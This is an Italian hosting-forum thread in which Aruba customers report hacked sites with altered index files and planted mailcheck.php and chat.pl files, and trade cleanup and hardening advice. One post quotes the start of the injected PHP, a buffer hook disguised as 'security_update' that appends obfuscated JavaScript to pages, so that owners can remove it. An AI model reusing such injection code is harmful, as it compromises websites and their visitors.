+ Rispondi alla Discussione
Risultati da 1 a 16 di 16

Aruba Nuovamente Hackerata

Ultimo Messaggio di Redemption il:
  1. #1
    Utente Premium
    Data Registrazione
    Nov 2008
    Messaggi
    269

    Aruba Nuovamente Hackerata

    Parlo da utente Aruba da ormai 4 anni e sinceramente mi sono rotto, possibile che su Tophost non hanno problemi di hacking e pago 10 all'anno e su Aruba che ne pago 40 in due anni gi il 4 attacco?

    Hanno modificato il file index.php di tutti i miei domini e su qualcuno hanno inserito un mailcheck.php sempre con codice malevolo.

    Aruba risponder come al solito che colpa dei cms scommettiamo?

  2. #2
    Utente Premium L'avatar di yabeforg
    Data Registrazione
    May 2010
    Messaggi
    761
    mai sentito.... cmq consigli Tophost?

  3. #3
    User Newbie
    Data Registrazione
    Jul 2010
    Messaggi
    3
    Ciao Redemption,
    anche io da anni che uso sia aruba che tophost e onestamente mi sto stancando di queste continue intrusioni... ne ho avuta una a novembre mentre ero in viaggio di nozze (non vi immaginate le best****e che giravano alle Hawaii) e un'intrusione ora.

    Mi raccomando, un consiglio: se sulla vostra login sono abbinati pi domini controllateli tutti, controllate i files index e la possibile presenza del file mailcheck

    tophost valido ma sotto certi aspetti ti limita molto nel caso si abbia un sito di discreto spessore

  4. #4
    Utente Premium
    Data Registrazione
    Nov 2008
    Messaggi
    269
    @yabeforg: se sei sotto i 1000 utenti gg o 2000pg/gg si altrimenti no.

    @reloaded: menomale che me lo ha segnalato un mio utente perch successo alle 14:30 e ho risolto alle 20 quando google aveva gi sgamato la cosa bloccandone alcune.

    Si, controllare tutti i domini e cambiare immediatamente password di accesso, perch clonano i dati di accesso di tutti gli account.

  5. #5
    Consiglio Direttivo L'avatar di Wolf Otakar
    Data Registrazione
    Apr 2006
    Localit
    Calabria
    Messaggi
    6,966
    Segui Wolf Otakar su Twitter
    Ciao ragazzi,


    lo script da rimuovere il seguente:

    <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var $a="Z63cZ3dZ225nZ2567Z2574h;
    ect, ect ect

    presente "come segnalato anche da Redemption" nelle:

    .index.html
    .index.php


    Per gli utenti wordpress: verificare anche i seguenti file in wp-includes


    • default-embeds.php
    • default-widgets.php
    • default-filters.php

    nella root:

    • wp-config.php
    • index.php
    • mailcheck.php --> da rimuovere


    nella cartella cgi-bin;

    • chat.pl --> da rimuovere







    Citazione Originariamente Scritto da Redemption Visualizza Messaggio
    Aruba risponder come al solito che colpa dei cms scommettiamo?

    ...
    Ultima modifica di Wolf Otakar; 05-08-10 alle 15:44 Motivo: Aggiunto file da rimuovere! ;)

  6. #6
    User
    Data Registrazione
    Jul 2010
    Messaggi
    22
    Io riguardo l'affidabilit di tophost st avendo dei dubbi da qualche mese a questa parte, ultimamente basta fare qualche ricerca su google per trovare commenti negativi o comunque non idilliaci sulle prestazioni e sicurezza dei loro server da parte dei loro clienti...riguardo Aruba che uno dei pi grossi in Italia, mi sembra realmente assurda questa notizia :S. Proprio ieri in cerca di un sito di web hosting adatto alle mie esigenze ho trovato see4u mi sembra che abbiano un buon rapporto qualit/prezzo. Qualcuno ne cliente?
    Ultima modifica di Wolf Otakar; 02-08-10 alle 10:39 Motivo: Maiuscole!

  7. #7
    User
    Data Registrazione
    Aug 2010
    Messaggi
    23
    Io credo che vada fatto un attimo di chiarezza: bisogna capire un secondo che versione del CMS installata (ricordo che vecchie versioni di wordpress hanno pesanti falle, idem per Joomla!) e quali plugins installati.

    Spesso e volentieri il bug arriva proprio da l. Per darvi un'idea: nel giro di due settimane gli sviluppatori di joomla han fatto uscire tre versioni diverse (sono passati dalla 1.5.18 alla 1.5.20 passando per la 1.5.19).

    Poi noto che le versioni sw che hanno sui servers non sono molto aggiornate (alcuni srv hanno versione 5.2.9 di php), ma spesso e volentieri vengono sfruttate prima le falle del sito e non del demone.

    E' anche molto pi semplice per l'hacker/cracker ed pure il primo spiraglio che si cerca prima di "bombare" l'intera macchina.

    Poi bisgona valutare anche altri fattori ma non sono argomenti del topic...

  8. #8
    User L'avatar di Daniele80
    Data Registrazione
    Aug 2005
    Localit
    Roma
    Messaggi
    648
    Per esperienza vi posso garantire che questi problemi sono dovuti ai seguenti problemi:

    1)Permessi sbagliati sui file e directory specialmente sulla root
    2)CMS non aggiornati
    3)password di ftp molto semplici

    Con le corrette permission e con i restanti due punti messi in sicurezza nessuno vi buchera' nulla a meno che non ci sia un bug nello script
    Europeanwebhost.com - Hosting, VPS, Server Dedicati

  9. #9
    Utente Premium
    Data Registrazione
    Nov 2008
    Messaggi
    269
    Sempre ultime versioni dei cms, password di almeno 8-10 caratteri con maiuscole e numeri permessi sempre 755.

    Anche questa volta Aruba ha fatto intendere che il problema era dal lato client con improbabili trojan che catturano gli username e le pwd degli ftp e poi si collegano tutti allo stesso momento... ora mi chiedo, chiss perch di tutti gli hosting che possiedo e di tutti i domini che ho mi succede sempre e solo su aruba.

  10. #10
    User
    Data Registrazione
    Aug 2010
    Messaggi
    23
    Citazione Originariamente Scritto da Redemption Visualizza Messaggio
    ***
    Concordo con quello che ha detto Daniele, riguardo invece le versioni: ripeto, potrebbe trattarsi di un bug non conosciuto presente sul CMS in uso.

    Poi entrano in gioco anche altri fattori (vedi quello che avevo scritto qualche post fa: le versioni dei demoni presenti sul server e la loro configurazione contano molto) ma il primo passo quello di tenere sicuro e aggiornato il sito.

    La "scusa" dei trojan ci pu anche stare: putroppo un episodio molto comune e quindi magari la usano come risposta predefinita...
    Ultima modifica di vhosting; 10-08-10 alle 22:43 Motivo: Full quote inutile

  11. #11
    User
    Data Registrazione
    Mar 2009
    Messaggi
    49
    Anche a me capita spesso con dominio aruba di trovare al posto della mia home l'avviso di sito malevolo...

  12. #12
    User
    Data Registrazione
    May 2010
    Messaggi
    156
    Ragazzi mi hanno hackerato un sito che ho su aruba..sono disperatissimo...era presente in gn anche...lo avevo pagato anche molto...non so che fare...non riesco ad entrare in ftp e nulla...mi hanno messo nell home sito in manutenzione ed amen...aiutatemi vi prego!!!

  13. #13
    User
    Data Registrazione
    May 2010
    Messaggi
    156
    mis che mi hanno cancellato tutto...ma proprio tutto...lo hanno portuto fare?

  14. #14
    Utente Premium
    Data Registrazione
    Nov 2008
    Messaggi
    269
    Non so che succede, nel mio sito di punta dice sito in manutenzione, ma tutti i domini sono andati, non riesco a capire che cosa sia successo.

  15. #15
    User
    Data Registrazione
    May 2010
    Messaggi
    156
    sucede anche ad altri...dicono sia aruba in manutenzione straordinaria....tutti i link post del mio sito, tranne la home dove dice "Sito in manutenzione" sono spariti...

  16. #16
    Utente Premium
    Data Registrazione
    Nov 2008
    Messaggi
    269
    I server SQL funzionano, la macchina server dove il sito viene hostato risponde al ping, che sia una manutenzione straordinaria?

+ Rispondi alla Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] Attivato
  • Il codice [VIDEO] Attivato
  • Il codice HTML Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.